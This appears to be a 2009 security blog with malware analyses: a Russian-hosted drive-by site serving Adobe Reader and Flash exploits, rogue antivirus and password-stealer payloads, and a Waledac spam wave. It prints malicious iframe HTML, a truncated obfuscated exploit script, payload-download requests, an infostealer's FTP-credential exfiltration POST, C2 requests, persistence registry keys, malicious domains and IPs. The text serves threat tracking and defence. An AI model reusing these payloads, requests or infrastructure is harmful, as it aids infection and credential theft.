Sunday, July 26, 2009

91.212.198.37 Badness

IP/Domain Analysis

IP address 91.212.198.37 is registered to (AS49314 NEVAL PE Nevedomskiy Alexey Alexeevich, Russia). The 91.212.198.0/24 netblock has been associated with various forms of cyber criminal activity.

inetnum: 91.212.198.0 - 91.212.198.255
netname: NEVAL
descr: Individual retailer Nevedomskiy A A
country: RU
org: ORG-IrNA1-RIPE
admin-c: NAA21-RIPE
tech-c: NAA21-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-END-MNT
mnt-by: NEVAL-mnt
mnt-lower: RIPE-NCC-END-MNT
mnt-routes: NEVAL-mnt
mnt-domains: NEVAL-mnt
source: RIPE # Filtered

organisation: ORG-IrNA1-RIPE
org-name: Individual retailer Nevedomskiy Alexey Alexeevich
abuse-mailbox: mailto:abuse.lirkz@gmail.com
org-type: OTHER
address: Russian Federation
mnt-ref: NEVAL-mnt
mnt-by: NEVAL-mnt
source: RIPE # Filtered

The IP 91.212.198.37 currently maps to the following domains.

• *.delzzerro.cn
• delzzerro.cn
• updatedate.cn
• www.delzzerro.cn

The domain delzzerro.cn was registered on 17 July 2009.

Domain Name: delzzerro.cn
ROID: 20090717s10001s59929740-cn
Domain Status: clientTransferProhibited
Registrant Organization: Real Host LTD
Registrant Name: Real Host
Administrative Email:
Sponsoring Registrar: 广东时代互联科技有限公司 (translated as Era of the Internet Technology Co., Ltd. Guangdong)
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Registration Date: 2009-07-17 02:17
Expiration Date: 2010-07-17 02:17

The domain updatedate.cn was registered on 8 July 2009.

Domain Name: updatedate.cn
ROID: 20090708s10001s08910501-cn
Domain Status: clientTransferProhibited
Registrant Organization: Real Host LTD
Registrant Name: Real Host
Administrative Email:
Sponsoring Registrar: 广东时代互联科技有限公司(translated as Era of the Internet Technology Co., Ltd. Guangdong)
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Registration Date: 2009-07-08 01:51
Expiration Date: 2010-07-08 01:51

The following websites provide historical malicious activity for AS49314, 91.212.198.0/24.

https://zeustracker.abuse.ch/monitor.php?as=49314
http://maliciousnetworks.org/ipinfo.php?as=AS49314&date=2009-07-22
http://www.malwaredomainlist.com/mdl.php?search=49314&colsearch=All&quantity=50 http://www.malwareurl.com/search.php?domain=&s=AS49314&match=0&rp=50&urls=on&redirs=on&ip=on&reverse=on&as=on

www.delzzerro.cn Analysis

The HTTP request for www.delzzerro.cn returns and iframe and script redirect.

<html>
<head><title>400</title></head>
<body>
<iframe go='400' width=1 src='/pic/p2.php' error='600' height="1"></iframe>
<div id="divid">
<script src='/pic/vq.png'></script>
</body>
</html>

http://www.delzzerro.cn/pic/p2.php

The request for p2.php returns a PDF file.

GET /pic/p2.php HTTP/1.1
Referer: http://www.delzzerro.cn/
Host: www.delzzerro.cn Connection: Keep-Alive

HTTP/1.1 200 OK
Content-Disposition: inline; filename=36.pdf
Content-Type: application/pdf

36.pdf

File: 36.pdf
Size: 27243
MD5: FDCF2B9803F7EF55C9C90BFA7627C0E9

The file 36.pdf contains exploit code targeted against 2 Adobe Reader vulnerabilities.

• Adobe util.printf, CVE-2008-2992
• Adobe getIcon, CVE-2009-0927

http://www.delzzerro.cn/pic/vq.png

The vq.png file, which was included in a script tag contains JavaScript. The .png technique is for obfuscation purposes. The JavaScript is used to exploit an Adobe Flash 0day vulnerability (CVE-2009-1862).

http://delzzerro.cn/pic/uzp.php

The payload of the collective exploits is a GET request for uzp.php which returns the binary file installb.exe.

GET /pic/uzp.php
Host: delzzerro.cn

HTTP/1.1 200 OK
Content-Disposition: inline; filename=installb.exe
Content-Type: application/octet-stream

http://91.212.198.37 Analysis

The HTTP request for 91.212.198.37 returns and iframe, script redirect and exploit code.

<html>
<head><title>404</title></head>
<body>
<iframe g='22' width=1 src='/img/p2.php' l='66' height="1"></iframe>
<script>
fg="%u2121%..;var .%u212.DE%u.1%u.%u.navigat.retVal.ibkka.var ..DE.=..return .5.C9E2.C9.0..C9.u..71.21.functio.A22.29.';.U+.+'.
......TRUNCATED......
split('.');for(J=u.length-1;J>-1;J--)Q[U]=Q[U].split(o[J]).join(u[J]);i8+=Q[U].replace(/./g,'"').replace(/./g,"\\").replace(/./g,"\n")}eval(i8);
</script>
<div id="divid">
<script src='/img/vw.png'></script>
</body>
</html>

http://91.212.198.37/img/p2.php

The request for p2.php returns a PDF file.

GET /img/p2.php
Referer: http://91.212.198.37/
Host: 91.212.198.37

HTTP/1.1 200 OK
Content-Disposition: inline; filename=119.pdf
Content-Type: application/pdf


119.pdf


File: 119.pdf
Size: 27360
MD5: 26A360E37812E6D5CCF31ED06CE692D9

The file 119.pdf contains exploit code targeted against 2 Adobe Reader vulnerabilities.

• Adobe util.printf, CVE-2008-2992
• Adobe getIcon, CVE-2009-0927

http://91.212.198.37/img/vw.png

The vw.png file, which was included in a script tag contains JavaScript. The .png technique is for obfuscation purposes. The JavaScript is used to exploit an Adobe Flash 0day vulnerability (CVE-2009-1862).

updatedate.cn/img/uzt.php

The payload of the collective exploits is a GET request for uzt.php which returns the binary file installb.exe.

GET /img/uzt.php
Host: updatedate.cn

HTTP/1.1 200
Content-Disposition: inline; filename=installb.exe
Content-Type: application/octet-stream

Malware Analysis

installb.exe

The malware installb.exe creates:

• Trojan.Virantix.C (Symantec) which attempts to lower system security settings, kill the process of antivirus applications and install rogue security products.
• PWS:Win32/Daurso (Microsoft) serves as an infostealer that keylogs and exfiltrates user accounts and passwords.

File: installb.exe
Size: 113664
MD5: D9A878871B90C68F4A1A155A3015A8FE

ThreatExpert
VirusTotal (4/41 current detection)

The malware installb.exe creates the following files:

C:\DOCUME~1\%user%\LOCALS~1\Temp\installb[1].exe

File: installb[1].exe
Size: 48128
MD5: 9145DA932AAB97CF50B5DE8DCDF80BE9

C:\WINDOWS\system32\braviax.exe

File: braviax.exe
Size: 11264
MD5: 61FEBE4C32CE9CB0DFCF55D373E0BAFD

VirusTotal (17/41 current detection)

C:\WINDOWS\system32\dllcache\figaro.sys (is later deleted)

C:\WINDOWS\drivers\beep.sys
C:\WINDOWS\system32\dllcache\beep.sys

File: beep.sys
Size: 32768
MD5: B040B5812B6668A232B18D397F721741

VirusTotal (20/38 current detection)

C:\WINDOWS\system32\Wbem\proquota.exe

File: proquota.exe
Size: 35840
MD5: 348BA619AAB3A92B99701335F95FE2A7

ThreatExpert
VirusTotal (5/41 current detection)

proquota.exe (PWS:Win32/Daurso)

The malware proquota.exe (PWS:Win32/Daurso) connects to squatead.com (212.150184.146, AS8584 Barak Netvision 013 Barak – Network, Israel).

POST /ptf/receiver/online HTTP/1.1
Host: squatead.com

The malware proquota.exe monitored and exfiltrated FTP credentials to squatead.com during dynamic analysis.

POST /ptf/receiver/ftp HTTP/1.1
Host: squatead.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1
Content-Length: 92
ftp_uri_0=p7uojZW2GGxfm637v7nEye4CbV7Y5%2FKP6Y6It1wqCsfk%2BeHqgYCrXA&ftp_source_0=lb250dzwDg


Trojan.Virantix.C


The Trojan.Virantix.C malware connects to komalinovskatas.com (66.79.178.199, AS27645 ASN-NA-MSG-01 Managed Solutions Group, Inc) in order to download the installer for the rogue security product Home Antivirus 2010. The domain komalinovskatas.com was registered on 2009/7/20.

Registrant:
Aleksandr Petrov mailto:radar@e2mail.ru +7.3412755886
Aleksandr Petrov
ul.Udmurtskaya d.141 kv.110
Izhevsk,Udmurtiya,RUSSIAN FEDERATION 426003


Domain Name:komalinovskatas.com
Record last updated at 2009-07-23 10:32:26
Record created on 2009/7/20
Record expired on 2010/7/20

Home Antivirus 2010 installer download.

GET /?wmid=1025&d=2&it=2&s=24 HTTP/1.1
Host: komalinovskatas.com

HTTP/1.1 302 Found
Location: /2/installer/Installer.exe?u=1025&s=b4eaa65e579e83c2248376cc88de9086&t=2


GET /2/installer/Installer.exe?u=1025&s=b4eaa65e579e83c2248376cc88de9086&t=2 HTTP/1.1
Host: komalinovskatas.com

HTTP/1.1 200 OK
Content-Disposition: attachment; filename="Install.exe";

The malware install.exe is written as c:\WINDOWS\system32\wisdstr.exe.

File: wisdstr.exe
Size: 181488
MD5: E68A91A3614435882DAAD5494CAE622E

ThreatExpert

The malware wisdstr.exe connects to bureltanovaderta.com (66.79.178.200, AS27645 ASN-NA-MSG-01 Managed Solutions Group, Inc) to download the remaining installation files associated with the rogue security product Home Antivirus 2010. The product provides false diagnostics and persistent notifications in an attempt to convince the victim to purchase a licensed version of the product.

GET /files/HomeAntivirus2010/Binaries1.cab HTTP/1.1
GET /files/HomeAntivirus2010/Binaries1.cab HTTP/1.1
GET /files/BinariesAVE.cab HTTP/1.1
GET /files/BinariesAVE.cab HTTP/1.1
GET /files/BinariesAdd.cab HTTP/1.1
GET /files/HomeAntivirus2010/BinariesGUI.cab HTTP/1.1
GET /files/BinariesSC.cab HTTP/1.1
GET /files/BinariesUpd.cab HTTP/1.1
GET / HTTP/1.1
GET /update_inst.php?wmid=1025&subid=b4eaa65e579e83c2248376cc88de9086&pid=2&lid=0&hs=F35A291E6CA636316E72ECAD75594619 HTTP/1.1

The domain bureltanovaderta.com is registered nearly identical to komalinovskatas.com.

Registrant:
Aleksandr Petrov radar@e2mail.ru +7.3412755886
Aleksandr Petrov
ul.Udmurtskaya d.141 kv.110
Izhevsk,Udmurtiya,RUSSIAN FEDERATION 426003


Domain Name:bureltanovaderta.com
Record last updated at 2009-07-24 10:06:32
Record created on 2009/7/20
Record expired on 2010/7/20



An over-sized Windows Security center opens indicating Virus Protection is not found. The window is part of the social; engineering effort to convince victims to purchase a licensed version of Home Antivirus 2010.



The malware also attempted C2 connections to cbbugltjud.com (195.2.253.240, AS12695 MADET-NET Moscow, Russia) to download additional malware. Other domains that resolve to 195.2.253.240 include:

*.cabkyykbbg.com
*.cbbugltjud.com
cabkyykbbg.com
cbbugltjud.com
www.cabkyykbbg.com
www.cbbugltjud.com

GET /progs/xfcgtyylqd/iejwn
Host: cbbugltjud.com

The iejwn download creates c:\alurm.exe.

File: alurm.exe
Size: 11264
MD5: 6BE4585C480B5C840E99BE9B190F7846

ThreatExpert

GET /progs/xfcgtyylqd/ziwwofwj.php
Host: cbbugltjud.com

GET /progs/xfcgtyylqd/czaarfj.php?adv=adv464
Host: cbbugltjud.com

Tuesday, July 21, 2009

Wednesday, July 8, 2009

Waledac - July 4th Wave

Keeping up with theme-based spam, Waledac began a new wave for the 4th of July. Shadowserver posted a list of 4th of July themed domains like the following:

fireworksholiday.com
freeindependence.com
happyindependence.com
holidayfirework.com

The TTP was the standard spam, fake YouTube video and executable download. A sample Waledac spam email hyperlink is for wpyn.fireholiday.com/video.exe. The domain wpyn.fireholiday.com resolves to numerous Fast Flux IP addresses. A quick resolution of the first 50 nodes is below:

112.76.132.115
118.232.163.47
118.34.184.174
124.123.15.55
200.114.156.47
200.75.122.114
200.8.236.97
201.213.101.148
201.75.55.113
204.19.202.167
213.106.51.95
213.63.244.54
213.89.177.19
217.132.89.78
24.56.242.144
24.88.106.240
60.2.41.179
60.244.160.18
61.35.161.29
69.86.53.176
71.12.11.2
71.137.1.103
71.17.123.33
71.230.75.255
77.37.144.56
81.97.199.10
82.1.200.141
82.67.81.223
83.233.163.135
83.233.18.128
84.108.85.123
84.109.209.107
85.201.139.159
85.230.122.138
86.123.150.156
87.116.182.176
88.163.104.87
88.169.133.14
89.136.112.46
89.215.93.163
89.34.67.226
89.74.183.203
89.76.121.249
89.76.52.152
92.53.34.101
92.53.34.101
93.100.87.113
97.89.139.5
98.239.10.9
98.246.19.23

sudosecure.net provides a cool tracking mechanism for Waledac binaries, Fast Flux IP addresses and domains.

Malware Analysis

File: video.exe
Size: 630784
MD5: 1D36E772F9892B64D810978B9A99541E

The Waledac malware video.exe creates a registry key referencing where the file was executed from. In this example, the file was executed from the desktop.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion "RList"
Type: REG_BINARY
Data: (data too large: 6944 bytes)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "PromoReg"
Type: REG_SZ
Data: C:\Documents and Settings\%User Profile%\Desktop\video.exe

The following are samples of initial connections to various Waledac controllers.

POST /rbbcrx.png
Host: 119.77.219.219

POST /lbohwj.png
Host: 98.25.97.68

POST / HTTP/1.1
Host: 93.100.114.158

POST /xdryoc.htm
Host: 134.155.241.188

POST /mzrbflwkczf.png
Host: 93.100.114.158